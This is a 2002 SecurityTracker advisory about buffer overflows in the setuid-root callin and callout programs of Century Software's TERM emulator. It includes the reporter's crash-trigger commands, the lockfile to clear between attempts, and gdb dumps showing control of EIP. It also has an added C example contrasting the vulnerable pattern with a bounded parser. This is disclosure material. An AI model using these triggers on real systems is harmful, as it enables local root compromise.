SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
Category:  Application (Generic)  >  TERM for UNIX / Linux
Vendors:  Century Software
Century Software's TERM Terminal Emulator Software Buffer Overflow Lets Local Users Gain Root Privileges on the System
Date:  Feb 23 2002
Impact:  Execution of arbitrary code via local system, Root access via local system
Exploit Included:  Yes  
Description:  A buffer overflow was reported in the TERM terminal emulation product from Century Software. A local user can execute arbitrary code to obtain root privileges on the system.

The software reportedly ships two root-owned set-user-id (suid) programs, callin and callout. Both apparently overflow a fixed-size stack buffer when given an over-long tty argument: the programs check that the argument begins with "tty" (anything else is rejected with "Arguments must be of form ttyNN") but do not bound its length, so a local user can overwrite the saved frame pointer and return address and execute arbitrary code with root privileges.

The following commands reportedly trigger the overflow; in the resulting core dumps both EBP and EIP hold 0x42424242 (the "B" fill bytes):

callin tty`perl -e 'print "B" x 9000'`
callout tty`perl -e 'print "B" x 9000'`

The programs create the lockfile /etc/LCK..inittab before crashing; it must be removed between attempts or they exit with "Non-expired lockfile: /etc/LCK..inittab".
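As an added illustration, not code from the advisory or from Century Software (the callin/callout source is not public), the C below models the pattern the crash output is consistent with: a setuid helper that checks only the "tty" prefix and then copies the argument into a fixed stack buffer, beside a hardened parser that bounds and validates the argument before anything is copied. The buffer size, function names and the exact form of the check are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not Century Software's code.  It models the flaw class the
 * advisory describes: a setuid-root helper taking an argument of the form
 * ttyNN.  The observed behaviour ("AAAA..." rejected with "Arguments must be
 * of form ttyNN", "tty" + 9000 bytes segfaulting with EIP = 0x42424242) is
 * consistent with a prefix check followed by an unbounded copy into a fixed
 * stack buffer.  Sizes and names below are assumed. */

#define DEVPATH_MAX 16          /* assumed size of the on-stack path buffer */

/* Vulnerable pattern (assumed): the prefix is checked, the length is not.
 * Exercised here only with short arguments; with a long one the saved
 * EBP/EIP above devpath[] are overwritten, as the advisory's core dump shows. */
int open_tty_unsafe(const char *arg)
{
    char devpath[DEVPATH_MAX];

    if (strncmp(arg, "tty", 3) != 0) {
        fputs("Arguments must be of form ttyNN\n", stderr);
        return -1;
    }
    strcpy(devpath, "/dev/");
    strcat(devpath, arg);       /* BUG: no bound on strlen(arg) */
    /* ... open(devpath, ...) would follow ... */
    return 0;
}

/* Hardened form: validate the whole argument (prefix, digits only, bounded
 * length) before it touches the fixed buffer, then build the path with a
 * bounded call.  Fills `out` and returns 0 on success, -1 on rejection. */
int parse_tty_arg(const char *arg, char *out, size_t outlen)
{
    const char *num;
    size_t n, i;

    if (arg == NULL || out == NULL || outlen == 0)
        return -1;
    if (strncmp(arg, "tty", 3) != 0)
        return -1;
    num = arg + 3;
    n = strlen(num);
    if (n == 0 || n > 3)        /* ttyN .. ttyNNN; rejects the 9000-byte trigger */
        return -1;
    for (i = 0; i < n; i++)
        if (!isdigit((unsigned char)num[i]))
            return -1;          /* also blocks "tty../..", "tty0/x", etc. */
    /* snprintf never writes past outlen; the >= check detects truncation */
    if (snprintf(out, outlen, "/dev/%s", arg) >= (int)outlen)
        return -1;
    return 0;
}

/* Builds an argument of the same shape as the advisory's trigger:
 * "tty" followed by `count` copies of `fill`.  Caller frees the result. */
char *make_trigger(size_t count, char fill)
{
    char *s = malloc(3 + count + 1);
    if (s == NULL)
        return NULL;
    memcpy(s, "tty", 3);
    memset(s + 3, fill, count);
    s[3 + count] = '\0';
    return s;
}

int main(void)
{
    char path[DEVPATH_MAX];
    char *big = make_trigger(9000, 'B');   /* constructed input, same shape as the advisory's */

    printf("tty12     -> %s\n", parse_tty_arg("tty12", path, sizeof path) == 0 ? path : "rejected");
    printf("AAAA      -> %s\n", parse_tty_arg("AAAA", path, sizeof path) == 0 ? path : "rejected");
    printf("ttyB*9000 -> %s\n", big && parse_tty_arg(big, path, sizeof path) == 0 ? path : "rejected");
    free(big);
    return 0;
}
```

Compile with `cc -Wall example.c` and run it; the hardened parser rejects the 9000-byte argument before any copy takes place. Note that swapping strcat for snprintf alone would only turn the overflow into silent truncation: the length and character-set checks are the actual fix, and they also keep a setuid program from being pointed at arbitrary device paths.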

Impact:  A local user can execute arbitrary code on the system to obtain root privileges on the system.
Solution:  No solution was available at the time of this entry.
Vendor URL:  te.censoft.com/products/term_unix.php (Links to External Site)
Cause:  Boundary error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  KF <dotslash@snosoft.com>
Message History:   None.


 Source Message Contents

Date:  Fri, 22 Feb 2002 13:16:18 -0500
From:  KF <dotslash@snosoft.com>
Subject:  Censoft TERM Emu bOf

 

Vendor: www.censoft.com

Product: TERM for UNIX / Linux
Emulations Wyse 60, SCO ANSI, VT220 Terminal
Supports SCO, AIX, HP, DEC, Solaris Operating Environment[tm] software, and Linux[tm] 

I WAS going to purchase this product after trying the eval; however, I changed my mind for some reason.
..I would imagine the full product is also vulnerable.

[elguapo@linux elguapo]$ ftp ftp.censoft.com
Connected to ftp.censoft.com.
220 ns.centurysoftware.com FTP server (Version 6.00) ready.
Name (ftp.censoft.com:elguapo): anonymous
331 Guest login ok, send your email address as password.
Password:
230- Welcome To Century Software Ftp Server.
230-
230- Here you will find all the Century Software
230- Products.
230- ...
ftp> cd download/windows/linux
250 CWD command successful.
ftp> get termlx.tar
local: termlx.tar remote: termlx.tar
200 PORT command successful.
150 Opening BINARY mode data connection for 'termlx.tar' (931840 bytes).
226 Transfer complete.

As you can see the .tar file has some suid root stuff to play with

[elguapo@linux elguapo]$ tar tvf termlx.tar
-rwxr-xr-x root/root   630976 2000-04-01 02:00:00 term
-rwsr-xr-x root/root    96988 1999-03-22 23:52:10 callin
-rwsr-xr-x root/root    97144 1999-03-22 23:52:11 callout
-rwxr-xr-x root/root    94484 1999-03-22 23:52:10 brand

Apparently I don't play nice

[elguapo@linux elguapo]$ /home/elguapo/Censoft/callin `perl -e 'print "A" x 9000'`
Arguments must be of form ttyNN
[elguapo@linux elguapo]$ /home/elguapo/Censoft/callin tty`perl -e 'print "A" x 9000'`
Segmentation fault (core dumped)

rm /etc/LCK..inittab if you need to try again or you will get the following message:
Non-expired lockfile: /etc/LCK..inittab

Let's check the stack out a bit.

[root@linux /root]# gdb /home/elguapo/Censoft/callin core
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
Core was generated by `BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB'.
Program terminated with signal 11, Segmentation fault.
#0  0x42424242 in ?? ()
(gdb) i r
eax            0xffffffff       -1
ecx            0xbfffd3a4       -1073753180
edx            0x1              1
ebx            0x805fdf0        134610416
esp            0xbfffd3ec       0xbfffd3ec
ebp            0x42424242       0x42424242
esi            0xbfffd400       -1073753088
edi            0xbfffd858       -1073751976
eip            0x42424242       0x42424242

The callout binary is also affected.

[root@linux /root]# /home/elguapo/Censoft/callout tty`perl -e 'print "B" x 9000'`
Segmentation fault (core dumped)
[root@linux /root]# gdb /home/elguapo/Censoft/callout core
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
Core was generated by `BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB'.
Program terminated with signal 11, Segmentation fault.
#0  0x42424242 in ?? ()
(gdb) i r
eax            0xffffffff       -1
ecx            0xbfffd3a4       -1073753180
edx            0x1              1
ebx            0x805fe88        134610568
esp            0xbfffd3ec       0xbfffd3ec
ebp            0x42424242       0x42424242
esi            0xbfffd400       -1073753088
edi            0xbfffd856       -1073751978
eip            0x42424242       0x42424242

-KF


Copyright 2002, SecurityGlobal.net LLC